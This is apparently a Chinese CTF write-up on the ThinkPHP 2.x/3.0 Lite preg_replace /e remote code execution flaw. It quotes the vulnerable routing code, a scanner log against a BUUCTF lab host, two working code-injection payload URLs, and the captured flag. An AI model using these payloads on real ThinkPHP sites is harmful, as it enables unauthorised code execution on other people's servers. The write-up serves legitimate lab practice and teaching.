任意代码执行漏洞
ThinkPHP 2.x版本中,使用
preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
POC检测
[15:05:31] [INFO] 检测到: thinkphp_lite_code_exec from script thinkphp_lite_code_exec.py, 目标: http://node5.buuoj.cn:27744/
[15:05:31] [INFO] 正在检测 [29%/1][http://node5.buuoj.cn:27744] poc: thinkphp_pay_orderid_sqli
[15:05:31] [INFO] 正在检测 [30%/1][http://node5.buuoj.cn:27744] poc: thinkphp_method_filter_code_exec
[15:05:31] [INFO] 检测到: Thinkphp 2.x rce from script thinkphp2_rce.py, 目标: http://node5.buuoj.cn:27744/经过poc检测,该版本的thinphp 2.x存在rce漏洞!
漏洞利用
----
[!] Name: thinkphp_lite_code_exec
Script: thinkphp_lite_code_exec.py
Url: http://node5.buuoj.cn:27744/
Vulnerable: True
Method: GET
Payload: http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
[!] Name: Thinkphp 2.x rce
Script: thinkphp2_rce.py
Url: http://node5.buuoj.cn:27744/
Vulnerable: True
Attack: True
Method: GET
Payload: http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
----
http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7Dhttp://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
经过验证两个payload都可以使用!我们查看phpinfo页面!
get flag
自由组合payload,都可以触发代码执行漏洞!
flag{f2613e0d-5ccc-42d9-b18b-509dc185df9c}
![[Python] 如何在控制台进行输入输出](https://img-blog.csdnimg.cn/direct/b8a2f1666f3a471eaa3b8ad58ea3443e.jpeg)
![[VulnHub靶机渗透] WestWild 1.1](https://img-blog.csdnimg.cn/direct/7a7bc257524d4cd6aa5a5aebbf23b393.png)
